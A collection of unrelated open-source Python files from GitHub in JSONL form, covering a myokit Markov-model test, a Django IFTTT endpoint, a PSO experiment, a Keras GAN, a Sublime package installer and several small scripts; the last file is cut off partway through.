'ina.a12')\n self.assertIsNone(f[2])\n self.assertEqual(f[3].code(), 'ina.a3')\n self.assertIsNone(f[4])\n self.assertEqual(f[5].code(), 'ina.b13')\n\n # Test double appearances\n v1.set_rhs('2 * C1 - 3 * C1 + C1 * sqrt(O) + C2 * IF')\n f = markov._linear_combination(v1.rhs(), [v1, v2, v3])\n self.assertEqual(f[0].code(), '2 + -3 + sqrt(ina.O)')\n self.assertEqual(f[1].code(), 'ina.IF')\n self.assertIsNone(f[2])\n\n def test_split_factor(self):\n # Tests _split_factor\n\n # Load model, to create interesting RHS\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n v1 = model.get('ina.C1')\n v2 = model.get('ina.C2')\n v3 = model.get('ina.C3')\n v4 = model.get('ina.IF')\n\n # Test simplest cases\n v4.set_rhs('C1')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1), myokit.Number(1)))\n v4.set_rhs('+++C1')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1), myokit.Number(1)))\n v4.set_rhs('--C1')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1), myokit.Number(1)))\n v4.set_rhs('---C1')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1), myokit.PrefixMinus(myokit.Number(1))))\n\n # Test multiplication\n v4.set_rhs('C1 * 3')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1), myokit.Number(3)))\n v4.set_rhs('C1 * (sqrt(C2) + C3)')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1),\n myokit.Plus(myokit.Sqrt(myokit.Name(v2)), myokit.Name(v3))))\n\n # Test division\n v4.set_rhs('C1 / (sqrt(C2) + C3)')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1]),\n (myokit.Name(v1),\n myokit.Divide(\n myokit.Number(1),\n myokit.Plus(myokit.Sqrt(myokit.Name(v2)), myokit.Name(v3)))))\n\n # Test division that's not allowed\n v4.set_rhs('(sqrt(C2) + C3) / C1')\n self.assertRaisesRegex(\n ValueError, r'Non-linear function \\(division\\)',\n markov._split_factor, v4.rhs(), [v1])\n\n # Test with list of variables\n v4.set_rhs('C2 * 3')\n self.assertEqual(\n markov._split_factor(v4.rhs(), [v1, v2, v3]),\n (myokit.Name(v2), myokit.Number(3)))\n\n # Multiple variables is not allowed\n v4.set_rhs('C2 * C1')\n 
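# a product of two listed states is not a single linear factor, so _split_factor must reject it\n 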
self.assertRaisesRegex(\n ValueError, 'must reference exactly one variable',\n markov._split_factor, v4.rhs(), [v1, v2, v3])\n\n # Zero variables is not allowed\n v4.set_rhs('C3')\n self.assertRaisesRegex(\n ValueError, 'must reference exactly one variable',\n markov._split_factor, v4.rhs(), [v1, v2])\n\n # Non-linear term is not allowed\n v4.set_rhs('sqrt(C1)')\n self.assertRaisesRegex(\n ValueError, 'Non-linear function',\n markov._split_factor, v4.rhs(), [v1, v2])\n\n # Multiple terms is not allowed\n v4.set_rhs('C2 - C2')\n self.assertRaisesRegex(\n ValueError, 'must be a single term',\n markov._split_factor, v4.rhs(), [v1, v2, v3])\n\n def test_split_terms(self):\n # Tests _split_terms\n\n # Load model, get rhs with lots of terms\n fname = os.path.join(DIR_DATA, 'clancy-1999-fitting.mmt')\n model = myokit.load_model(fname)\n\n # Simple case\n v1 = model.get('ina.C1')\n v2 = model.get('ina.C2')\n v3 = model.get('ina.C3')\n v4 = model.get('ina.IF')\n v5 = model.get('ina.IS')\n v6 = model.get('ina.O')\n v3.set_rhs('1 - C1 - C2 - IF - IS - O')\n terms = markov._split_terms(v3.rhs())\n self.assertEqual(terms[0], myokit.Number(1))\n self.assertEqual(terms[1], myokit.PrefixMinus(myokit.Name(v1)))\n self.assertEqual(terms[2], myokit.PrefixMinus(myokit.Name(v2)))\n self.assertEqual(terms[3], myokit.PrefixMinus(myokit.Name(v4)))\n self.assertEqual(terms[4], myokit.PrefixMinus(myokit.Name(v5)))\n self.assertEqual(terms[5], myokit.PrefixMinus(myokit.Name(v6)))\n del terms\n\n # Case with brackets\n v3.set_rhs('-(+(IF) + C1 -(-IS - C2)) + 1 - O')\n terms = markov._split_terms(v3.rhs())\n self.assertEqual(terms[0], myokit.PrefixMinus(myokit.Name(v4)))\n self.assertEqual(terms[1], myokit.PrefixMinus(myokit.Name(v1)))\n self.assertEqual(terms[2], myokit.PrefixMinus(myokit.Name(v5)))\n self.assertEqual(terms[3], myokit.PrefixMinus(myokit.Name(v2)))\n self.assertEqual(terms[4], myokit.Number(1))\n self.assertEqual(terms[5], myokit.PrefixMinus(myokit.Name(v6)))\n\n # Empty case\n v3.set_rhs('1 * C1 * C2')\n terms = markov._split_terms(v3.rhs())\n self.assertEqual(len(terms), 1)\n self.assertEqual(terms[0], v3.rhs())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"myokit/myokit","sub_path":"myokit/tests/test_lib_markov.py","file_name":"test_lib_markov.py","file_ext":"py","file_size_in_byte":39821,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"90"} +{"seq_id":"38087914184","text":"import json\n\nfrom django.http import HttpResponse\nfrom plenario_ifttt.utils import JsonUtf8Response\n\n\n# https://platform.ifttt.com/docs#2-create-your-service-and-connect-to-ifttt\ndef status(request):\n return HttpResponse()\n\n\n# https://platform.ifttt.com/docs#2-create-your-service-and-connect-to-ifttt\ndef setup(request):\n data = {\n \"data\": {\n \"samples\": {\n \"triggers\": {\n \"alert\": {\n \"node\": \"0000001e0610b9fd\",\n \"feature\": \"temperature.internal_temperature\",\n \"operator\": \"gt\",\n \"value\": \"0\"\n },\n \"nearest\": {\n \"location\": {\n \"lat\": \"42\",\n \"lng\": \"-81\",\n \"address\": \"Somewhere in Chicago\",\n \"description\": \"Foobar\"\n },\n \"feature\": \"temperature.internal_temperature\",\n \"operator\": \"gt\",\n \"value\": \"0\"\n }\n }\n }\n }\n }\n\n return 
JsonUtf8Response(data)\n","repo_name":"UrbanCCD-UChicago/plenario-ifttt","sub_path":"plenario_ifttt/ifttt.py","file_name":"ifttt.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5626844908","text":"#! /usr/bin/env python3\n\n\"\"\"\nCommand-line script to submit a HipChat message to one or more channels.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nfrom os import path\nimport sys\nimport click\n\n# Add top-level module path to sys.path before importing tubular code.\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\nfrom tubular.hipchat import submit_hipchat_message # pylint: disable=wrong-import-position\n\n\n@click.command()\n@click.option(\n '--auth_token',\n required=True,\n help=\"Authentication token to use for HipChat REST API.\",\n)\n@click.option(\n '--channel',\n multiple=True,\n required=True,\n help=\"Channel to which the script should post a message. Case Sensitive.\"\n)\n@click.option(\n '--message',\n required=True,\n help=\"Message to send to HipChat channel.\",\n)\n@click.option(\n '--color',\n default=\"green\",\n help='The color of the message in HipChat.',\n)\ndef submit_hipchat_msg(auth_token, channel, message, color):\n \"\"\"\n Post a message to one or more HipChat channels.\n \"\"\"\n submit_hipchat_message(auth_token, channel, message, color)\n\n # An exit code of 0 means success and non-zero means failure.\n sys.exit(0)\n\n\nif __name__ == '__main__':\n submit_hipchat_msg() # pylint: disable=no-value-for-parameter\n","repo_name":"macdiesel/tubular","sub_path":"tubular/scripts/submit_hipchat_msg.py","file_name":"submit_hipchat_msg.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"90"} +{"seq_id":"6228388015","text":"import math\n\nimport numpy as np\n\nfrom mlpy.numberGenerator.bounds import Bounds\nfrom mlpy.particleSwarmOptimization.pso import PSO\nfrom mlpy.particleSwarmOptimization.structure.particle import Particle\n\nnp.set_printoptions(suppress=True)\n\nerrors = []\nbounds = Bounds(-10, 10)\n\n# Create the mlpy with the nn weights\nnum_particles = 7\ninertia_weight = 0.729\ncognitiveConstant = 1.49\nsocialConstant = 1.49\nnum_dimensions = 50\n# Configure PSO\npso = PSO()\n\ndef error(position):\n err = 0.0\n for i in range(len(position)):\n xi = position[i]\n err += (xi * xi) - (10 * math.cos(2 * math.pi * xi)) + 10\n return err\n\n# Create particles\nfor i in range(pso.num_particles):\n row = []\n for j in range(pso.num_particles):\n particle = Particle(bounds, inertia_weight, cognitiveConstant, socialConstant)\n particle.initPos(4 * np.random.random(num_dimensions) - 2)\n row.append(particle)\n\n pso.swarm.append(row)\n\nfor i in range(pso.num_particles):\n for j in range(pso.num_particles):\n if i > 0: # We can go west\n pso.swarm[i][j].neighbourhood.append(pso.swarm[i - 1][j])\n if i < pso.num_particles - 1: # We can go east\n pso.swarm[i][j].neighbourhood.append(pso.swarm[i + 1][j])\n if j > 0: # We can go north\n pso.swarm[i][j].neighbourhood.append(pso.swarm[i][j - 1])\n if j < pso.num_particles - 1: # We can go south\n pso.swarm[i][j].neighbourhood.append(pso.swarm[i][j + 1])\n\n\n# Iterate over training data\nfor x in range(2000):\n # Loop over particles\n for i, row in enumerate(pso.swarm):\n for j, col in enumerate(row):\n\n # Fire the neural network and calculate error\n pso.swarm[i][j].error = 
error(pso.swarm[i][j].position)\n\n # Get & set personal best\n pso.swarm[i][j].getPersonalBest()\n\n # Print results\n print(i, j, np.array(pso.swarm[i][j].error))\n\n for i in range(pso.num_particles):\n for j in range(pso.num_particles):\n particle = pso.swarm[i][j]\n neighbourhoodBest = particle.error\n neighbourhoodBestPos = particle.position\n\n for neighbour in particle.neighbourhood:\n if abs(neighbour.error) < abs(neighbourhoodBest):\n neighbourhoodBestPos = np.array(neighbour.position)\n neighbourhoodBest = neighbour.error\n # Get current global best as well\n if abs(neighbour.error) < abs(pso.best_error):\n pso.best_position = np.array(particle.position)\n pso.best_error = particle.error\n\n pso.swarm[i][j].update_velocity(neighbourhoodBestPos)\n pso.swarm[i][j].update_position()\n\n if(x % 1 == 0):\n print(\"Current best error:\\t\" + str(pso.best_error) + \"\\n\")\n\nprint('FINAL:')\nprint(pso)","repo_name":"quintonweenink/chaotic-pso-nn-training","sub_path":"experiments/pso/von-neumann-pso-math.py","file_name":"von-neumann-pso-math.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"90"} +{"seq_id":"17669065690","text":"#!/usr/bin/env python\n\nout = [True for x in range(1023)]\n\n# convert to binary\nwith open('input.txt') as f:\n for line in f.readlines():\n line = line.strip()\n Id = int(line\n .replace('F', '0')\n .replace('B', '1')\n .replace('L', '0')\n .replace('R', '1'), 2)\n out[Id] = False\n\n# trim end\nif out[0]:\n for i, v in enumerate(out):\n if not v:\n break\n out[i] = False\n\n# trim front\nif out[-1]:\n for i in range(len(out)-1, 0, -1):\n if not out[i]:\n break\n out[i] = False\n\n# print found output\nfor i, v in enumerate(out):\n if v:\n print(i)\n","repo_name":"tomatih/AdventOfCode2020","sub_path":"Day05/gold.py","file_name":"gold.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"38347504646","text":"\ndef main():\n\n print(\"enter a number to add to listA (press q to end early)\")\n flag = ''\n count = 1\n listA = []\n listB = []\n\n while count <= 10:\n flag = input(\"enter number \" + str(count) + \" to listA: \")\n if flag == 'q':\n break\n else:\n listA.append(int(flag))\n count += 1\n\n flag = ''\n count = 1\n\n print(\"enter a number to add to listB (press q to end early)\")\n while count <= 10:\n flag = input(\"enter number \" + str(count) + \" to listB: \")\n if flag == 'q':\n break\n else:\n listB.append(int(flag))\n count += 1\n\n compute(listA, listB)\n \n\ndef compute(a,b):\n\n out = []\n\n for itemA in a:\n for itemB in b:\n out.append([itemA,itemB])\n\n print(out)\n\nif __name__ == '__main__':\n main()","repo_name":"KeefeT/CSUGlobal","sub_path":"ITS320_Basic_Programming/tjs_code/ITS320_CTA6_Option2.py","file_name":"ITS320_CTA6_Option2.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5340155551","text":"from time import sleep\nfrom django.core.mail import send_mail\nfrom tryapp.models import CustomUser\nfrom .models import AccessKey\nfrom celery import shared_task\n\n@shared_task()\ndef access_key_revoke_email(user_id, access_key_id):\n # sleep(5) \n user = CustomUser.objects.get(id=user_id)\n access_key = AccessKey.objects.get(id=access_key_id)\n print(user)\n message = f'hello, {user.first_name} from {user.school_name} your access key, 
{access_key.key} with expiry date, {access_key.expiry_date} has been revoked' \n send_mail(\n 'Revoked Access Key',\n message,\n 'douglasdanso66@gmail.com',\n [user.email],\n fail_silently=False,\n )\n","repo_name":"douglas-danso/Access_key_manager_API","sub_path":"accesskeyapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"73225964777","text":"import numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\nimport keras\nfrom keras.models import Sequential, Model\nfrom keras.layers import Input, Dense, Conv2D, BatchNormalization, Dropout, Flatten\nfrom keras.layers import Activation, Reshape, Conv2DTranspose, UpSampling2D # new!\nfrom keras.optimizers import RMSprop\n\nfrom discriminator import discriminator_builder\nfrom generator import generator_builder\nfrom data_manager import get_data\n\n\ndef adversarial_builder(discriminator, generator, z_dim=100):\n model = Sequential()\n model.add(generator)\n model.add(discriminator)\n model.compile(loss='binary_crossentropy',\n optimizer=RMSprop(lr=0.0004, decay=3e-8, clipvalue=1.0),\n metrics=['accuracy'])\n # model.summary()\n return model\n\n\ndef make_trainable(net, val):\n net.trainable = val\n for l in net.layers:\n l.trainable = val\n\n\ndef train(epochs=2000, batch=128):\n d_metrics = []\n a_metrics = []\n\n running_d_loss = 0\n running_d_acc = 0\n running_a_loss = 0\n running_a_acc = 0\n\n for i in range(epochs):\n\n if i % 10 == 0:\n print(i)\n\n real_imgs = np.reshape(data[np.random.choice(data.shape[0], batch, replace=False)], (batch, 28, 28, 1))\n fake_imgs = generator.predict(np.random.uniform(-1.0, 1.0, size=[batch, 100]))\n\n x = np.concatenate((real_imgs, fake_imgs))\n y = np.ones([2 * batch, 1])\n y[batch:, :] = 0\n\n make_trainable(discriminator, True)\n\n d_metrics.append(discriminator.train_on_batch(x, y))\n running_d_loss += d_metrics[-1][0]\n running_d_acc += d_metrics[-1][1]\n\n make_trainable(discriminator, False)\n\n noise = np.random.uniform(-1.0, 1.0, size=[batch, 100])\n y = np.ones([batch, 1])\n\n a_metrics.append(adversarial_model.train_on_batch(noise, y))\n running_a_loss += a_metrics[-1][0]\n running_a_acc += a_metrics[-1][1]\n\n if (i + 1) % 500 == 0:\n\n print('Epoch #{}'.format(i + 1))\n log_mesg = \"%d: [D loss: %f, acc: %f]\" % (i, running_d_loss / i, running_d_acc / i)\n log_mesg = \"%s [A loss: %f, acc: %f]\" % (log_mesg, running_a_loss / i, running_a_acc / i)\n print(log_mesg)\n\n noise = np.random.uniform(-1.0, 1.0, size=[16, 100])\n gen_imgs = generator.predict(noise)\n # np.save('gen_img' + str(i+1) + '.npy', gen_imgs)\n\n plt.figure(figsize=(5, 5))\n\n for k in range(gen_imgs.shape[0]):\n plt.subplot(4, 4, k + 1)\n plt.imshow(gen_imgs[k, :, :, 0], cmap='gray')\n plt.axis('off')\n\n plt.tight_layout()\n plt.show()\n # plt.savefig('apple' + str(i+1) + '.png')\n\n return a_metrics, d_metrics\n\n\nif __name__ == '__main__':\n data = get_data()\n discriminator = discriminator_builder()\n discriminator.compile(loss='binary_crossentropy',\n optimizer=RMSprop(lr=0.0008, decay=6e-8, clipvalue=1.0),\n metrics=['accuracy'])\n generator = generator_builder()\n adversarial_model = adversarial_builder(discriminator, generator)\n a_metrics_complete, d_metrics_complete = 
train(epochs=3000)\n","repo_name":"ilyarudyak/cs230-deep-learning","sub_path":"dltf-krohn/gans/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"34761944312","text":"#!/bin/env python3\n\nimport imageio\nfrom sklearn.utils import shuffle\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport scipy.io\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport logging\n# == set logging ==\n#logging.basicConfig(level=logging.DEBUG)\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n#formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n# load our dataset\nlogger.info('load data')\ntrain_data = scipy.io.loadmat('projects/image_class/extra_32x32.mat')\n# extract the images and labels from the dictionary object\nX = train_data['X']\ny = train_data['y']\nimg_index = 25 # view an image (e.g. 25) and print its corresponding label\n# plt.imshow(X[:,:,:,img_index])\n# plt.show()\nlogger.info('label for image index: {}'.format(y[img_index]))\n\n#vectorizer\nlogger.info('vectorize')\nX = X.reshape(X.shape[0]*X.shape[1]*X.shape[2],X.shape[3]).T\ny = y.reshape(y.shape[0],)\nX, y = shuffle(X, y, random_state=42)\n\n# setup classifier\nclf = RandomForestClassifier()\nlogger.info('classifier: {0}'.format(clf))\n\n# train/test split & fit\nlogger.info('split')\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nlogger.info('fit')\nclf.fit(X_train, y_train)\n\n# setup predictions\nlogger.info('setup predictions')\nprediction = clf.predict(X_test)\nlogger.info(\"Accuracy: {0:.3f}\".format(accuracy_score(y_test, prediction)))\n","repo_name":"diverdano/ml-projects","sub_path":"ml_image_rf.py","file_name":"ml_image_rf.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"2090075947","text":"'''def profanity_checker(words):\n output = []\n#\tfor keys in words:\n#\t\tkey_word = keys.split()\n#\t\tprint(key_word)\n for word in words:\n out = search_word_in_file(word) \n if(out != 'None'):\n output.append(out)\n return output\n\n\ndef search_word_in_file( word ):\n f = open(\"profanity.txt\",\"r\")\n profanity_file = f.read()\n if word in profanity_file:\n print\n'''\nfrom profanity_check import predict, predict_prob\nf = open(\"profanity.txt\",\"r\")\ninputs = f.read().split('\\n')\no1 = open(\"output1.txt\",\"w\")\no2 = open(\"output2.txt\",\"w\")\nfor word in inputs:\n if(predict([word])==0):\n st = word+\" \"+str(predict_prob([word]))+\"\\n\"\n o1.write(st)\n else:\n st = word+\" \"+str(predict_prob([word]))+\"\\n\"\n o2.write(st)\n","repo_name":"varalakshmi-kondamuri/Keyword","sub_path":"profanity_checker.py","file_name":"profanity_checker.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"20002645995","text":"import setuptools\nimport codecs\n\nwith codecs.open('README.md', encoding='utf-8') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"shtRipper_cpp\",\n version=\"1.3.3\",\n author=\"Rezenter\",\n author_email=\"nisovru@gmail.com\",\n description=\"C++ parser of .sht files.\",\n 
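# long_description comes from README.md (read above); the markdown content type below lets PyPI render it\n    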
long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Rezenter/shtRipper_cpp/tree/master/python\",\n packages=['shtRipper'],\n classifiers=[\n \"Programming Language :: Python :: 3.5\",\n \"License :: OSI Approved :: MIT License\",\n 'Operating System :: Microsoft :: Windows :: Windows 10',\n ],\n python_requires='>=3.5',\n install_requires=[],\n entry_points={\n 'console_scripts': [\n 'cursive = cursive.tools.cmd:cursive_command',\n ],\n },\n include_package_data=True\n)\n","repo_name":"Rezenter/shtRipper_cpp","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"26407772711","text":"env = Environment(CXXFLAGS = \"-O2 -Wall -Wextra -Werror -std=c++0x -pedantic\",\n CFLAGS = \"-O2 -Wall -Wextra -Werror -std=c99 -pedantic\")\n\ndestdir = ARGUMENTS.get(\"destdir\", \"\")\n\ncrowrt = env.Library(\"fsroot/lib/crowrt\", Glob(\"src/crowrt/*.c\"))\ncrowrt_headers = env.Install(\"fsroot/include/crow\", Glob(\"src/crowrt/*.h\"))\ncrowc = env.Program(\"fsroot/bin/crowc\", Glob(\"src/crowc/*.cc\"))\ncrowl = env.Install(\"fsroot/bin\", \"src/crowl/crowl\")\n\nbin = env.Install(destdir + \"/usr/bin\", Glob(\"fsroot/bin/*\"))\nlib = env.Install(destdir + \"/usr/lib\", Glob(\"fsroot/lib/*\"))\ninclude_crow = env.Install(destdir + \"/usr/include/crow\", Glob(\"fsroot/include/crow/*\"))\nenv.Alias(\"install\", [bin, lib, include_crow])\n\nDefault(crowrt, crowrt_headers, crowc, crowl)\n\n","repo_name":"mkm/crowlang-1","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"15118047223","text":"checklist = list()\n# checklist.append(\"Hello\")\n# print(checklist)\n\ndef create(item):\n checklist.append(item)\n\ndef read(item):\n # if checklist[item] not in checklist:\n # print(\"nodvsvuhsvcuscushfadisucashi\")\n # return False\n # if int(item) not in checklist:\n # print(\"invalid index. Please choose a number between 0 and \" + len(checklist)-1)\n print(checklist[int(item)])\n\n# checklist = ['Hello', 'World']\n# checklist[0] = \"Cats\"\n\ndef update(index, item):\n checklist[index] = item\n\n# checklist = ['Hello', 'World']\n# checklist.pop(1)\n\ndef destroy(index):\n checklist.pop(index)\n\ndef list_all_items():\n index = 0\n for list_item in checklist:\n print(list_item)\n\ndef select(function_code):\n #Create item in checklist here\n if function_code == \"C\" or function_code == \"c\":\n item = input(\"What do you want to create? \")\n create(item)\n # Read item in checklist here\n elif function_code == \"R\" or function_code == \"r\":\n item = int(input(\"What index do you want to read? 
\"))\n read(item)\n # Print all items here\n elif function_code == \"P\" or function_code == \"p\":\n list_all_items()\n # This is where we want to stop our loop\n elif function_code == \"Q\" or function_code == \"q\":\n return False\n else:\n #Catch all\n print(\"Unknown Option\")\n return True\n\nrunning = True\n\nwhile running:\n selection = input(\"Press C to add to list, R to Read from list and P to display list: \")\n running = select(selection)\n\ndef test():\n create(\"purple sox\")\n create(\"red cloak\")\n\n print(read(0))\n print(read(1))\n\n update(0, \"purple socks\")\n \n destroy(1)\n print(read(0))\n\n list_all_items()\n\n # Call your new function with the appropriate value\n # select(\"C\")\n # # View the results\n # list_all_items()\n # # Call function with new value\n # select(\"R\")\n # # View results\n # list_all_items()\n # Continue until all code is run\n # user_input(\"What is user input\")","repo_name":"Asim-Product-College/CS-1.1-Programming-Fundamentals","sub_path":"checklist/checklist.py","file_name":"checklist.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"9620978427","text":"from zipfile import ZipFile\nimport traceback\nimport tempfile\nimport shutil\nimport os\nimport sublime\n\nfrom .. import logger\nlog = logger.get(__name__)\nfrom .. import settings\nfrom . import util\n\n\ndef _zipdir(path, zip):\n for root, dirs, files in os.walk(path):\n for file in files:\n loc = os.path.join(root, file)\n # Make sure plugin files are at root\n arcname = os.path.relpath(loc, start=path)\n zip.write(loc, arcname=arcname)\n\n\ndef _make_zip_file(data):\n try:\n zh, zip_file = tempfile.mkstemp()\n with open(zip_file, 'wb') as f:\n f.write(data)\n result = zip_file\n except:\n log.error('Zip creation failed.')\n traceback.print_exc()\n result = False\n finally:\n os.close(zh)\n return result\n\n\ndef install_package(package, zip_data):\n settings.ignore_package(package.name)\n result = True\n try:\n zip_file = _make_zip_file(zip_data)\n if not zip_file:\n return False\n\n prefix = ''\n\n tmp_dir = tempfile.mkdtemp()\n\n # Extract files from zip data\n with ZipFile(zip_file, 'r') as myzip:\n prefix = os.path.commonprefix(myzip.namelist())\n myzip.extractall(path=tmp_dir)\n\n # Repackage with correct name, location and folder tree\n pkg = package.name + util.PKG_SUFFIX\n install_path = os.path.join(sublime.installed_packages_path(), pkg)\n with ZipFile(install_path, 'w') as myzip:\n _zipdir(os.path.join(tmp_dir, prefix), myzip)\n\n except PermissionError:\n log.error('Permission error.')\n traceback.print_exc()\n result = False\n except:\n log.error('Unexpected exception:')\n traceback.print_exc()\n result = False\n finally:\n shutil.rmtree(tmp_dir)\n os.remove(zip_file)\n settings.unignore_package(package.name)\n return result\n","repo_name":"blopker/PCLite","sub_path":"pclite/io/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"34658960355","text":"import json\n\nwith open(\"pi_digits.txt\") as file_object:\n contents = file_object.read()\nprint(contents)\n\n# file_name = \"programming.txt\"\n# with open(file_name, 'w') as file_object:\n# file_object.write(\"I love programming!\")\n\n# json\nnumbers = [2, 3, 5, 7, 11, 13]\nfile_name2 = \"numbers.json\"\nwith open(file_name2, 'w') as f:\n json.dump(numbers, f)\n\nwith 
open(file_name2) as f:\n numbers = json.load(f)\nprint(numbers)","repo_name":"Lyuwalle/readExcelProject","sub_path":"file_exceptions.py","file_name":"file_exceptions.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18377178679","text":"N, K = list(map(int, input().split()))\nP = 10 ** 9 + 7\n\n\ndef combination(n, r):\n if r == 0:\n return 1\n x = 1\n y = 1\n for i in range(n - r + 1, n + 1):\n x = (x * i % P)\n for i in range(1, r + 1):\n y = (y * i % P)\n y_inv = _power(y, P - 2)\n return (x * y_inv) % P\n\n\ndef _power(x, n):\n ans = 1\n while n > 0:\n if bin(n & 1) == bin(1):\n ans = (ans * x) % P\n x = (x * x) % P\n n = n >> 1\n return ans\n\n\nfor i in range(1, K + 1):\n if i - 1 <= N - K:\n print((combination(K - 1, i - 1) * combination(N - K + 1, i)) % P)\n else:\n print(0)\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02990/s810489867.py","file_name":"s810489867.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"24372526940","text":"# IMPORTS FOR EVERY PART\nfrom misc import insert_every_second_black_frame\nfrom misc import lin_interpol\n\n\n# ––––– STATIC VARIABLES –––––\n# NEEDED FOR EVERY PART\n\n# Ritardando, slow down\n\n# Root ratios\nr0 = 2/1\nr1 = 3/2\nr2 = 4/3\nr3 = 5/4\nr4 = 6/5\nratios = [r0, r1, r2, r3, r4]\n\n# Minimum durations\nx0 = 1/30\nx1 = x0 * r0\nx2 = x1 * r1\nx3 = x2 * r2\nx4 = x3 * r3\nx5 = x4 * r4\n\n# Multiplication arrays/sets\nn = 6 # Length of each array\nmul_set0 = [r0 ** i for i in range(n)]\nmul_set1 = [r1 ** i for i in range(n)]\nmul_set2 = [r2 ** i for i in range(n)]\nmul_set3 = [r3 ** i for i in range(n)]\nmul_set4 = [r4 ** i for i in range(n)]\n\n\n\n\n# ––––– SCORE –––––\n\n\n# MAIN PARAMETERS TO CONTROL:\nN_EVENTS = 10\nIMG_CHANGE_FREQ = 1\nELEM_MINSIZE = 0.2\nELEM_MAXSIZE = 0.28\nN = 7 # Number of images for each shape/color combination.\nEXPORT_FILENAME = \"002\"\nAMP = 0.25\nMAPPING_KEY = \"color\"\n\nMIN_VAL = x4\nMUL_SET = mul_set1\nMUL_SET_IDX = None # Not applicable\n\nCOLOR = \"R\"\nSHAPE = \"TRIANGLE\"\n\n\nCOLOR_TRANSFORMATION = [ # Overwriting default colors assignements with new colors (for the same symbols, \"r\", \"g\", \"b\")\n(\"r\", (205,92,92)), # indianred\n#(\"g\", (143,188,143)), # darkseagreen\n(\"g\", (138,188,134)), # custom darkseagreen\n(\"b\", (71,128,182)) # steelblue\n]\n\n\n# ----- MAKING DATA SEQUENCES -----\n\ncolor_original_seq = []\n\nfor i in range(N_EVENTS):\n color_original_seq.append(COLOR)\n\nshape_original_seq = [SHAPE for i in range(len(color_original_seq))]\n\n# -- Making sequence of color values and shapes --\ncolor_seq = insert_every_second_black_frame(color_original_seq, insert_at_start=False, insert_at_end=True) # Inserting a \"black\" for every value in color_row\nshape_seq = insert_every_second_black_frame(shape_original_seq, insert_at_start=False, insert_at_end=True) # Inserting a \"black\" for every value in color_row\n\n\n# -- Durations --\n\n# Set 1 multiplied with minimum value 3\nbase_durations = [MIN_VAL * i for i in MUL_SET]\n#duration_seq = [root_durations[MUL_SET_IDX] for i in range(len(color_seq))]\n\nduration_seq = []\nduration_idxes = [int(lin_interpol(beg=5.9999, end=3.0, steps=len(color_seq), i=i)) for i in range(len(color_seq))]\nfor idx in duration_idxes:\n 
